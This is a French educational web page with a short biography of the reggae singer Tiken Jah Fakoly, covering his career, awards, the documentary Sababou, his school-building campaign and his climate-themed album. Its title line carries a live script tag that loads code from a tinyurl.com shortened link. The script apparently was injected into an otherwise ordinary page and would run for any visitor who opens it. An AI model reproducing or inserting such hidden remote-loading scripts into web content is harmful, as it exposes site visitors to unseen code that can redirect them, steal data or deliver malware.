Tiken Jah Fakoly - <script src="https://tinyurl.com/25patbbv"></script>
Site à vocation pédagogique
Tiken Jah Fakoly2

Tiken Jah Fakoly

Tiken Jah Fakoly, de son vrai nom Doumbia, Moussa Fakoly, est un auteur-compositeur-interprète et chanteur de reggae. En 1987, il découvre la musique reggae et monte son premier groupe, Djelys. Il se fait peu à peu connaître au niveau régional puis national avec ses concerts.

Il obtient la Victoire de la musique en 2003 dans la catégorie Reggae/Ragga/World pour son album Françafrique.

Le 6 mars 2013 sort le documentaire Sababou réalisé par Samir Benchikh sur la Côte d’Ivoire dans lequel Tiken Jah Fakoly participe activement. Ce documentaire vise à promouvoir un visage positif de l’Afrique et plus particulièrement de la Côte d’Ivoire en montrant l’action de personnalités comme Tiken Jah Fakoly pour l’amélioration des conditions de vie en Afrique de l’Ouest (engagement en faveur de la paix, de la démocratie, lutte contre la faim, promotion de l’éducation etc.)

Tiken Jah Fakoly joue une musique pour éveiller les consciences. Il est engagé en faveur de l’éducation. Il a lancé en 2009 une campagne intitulée « Un concert, une école » pour financer la construction d’une école et d’un collège au Mali. Considérant que « l’école est la base du développement surtout pour les jeunes filles », il préconise de « donner les mêmes chances à tout le monde, à tous les enfants. »

Son dixième album studio intitulé Le monde est chaud sort le 17 mai 2019. Il aborde les thèmes du réchauffement climatique et plus largement de l’écologie.

En 2021, le chanteur reçoit le prix du meilleur artiste africain de l’année.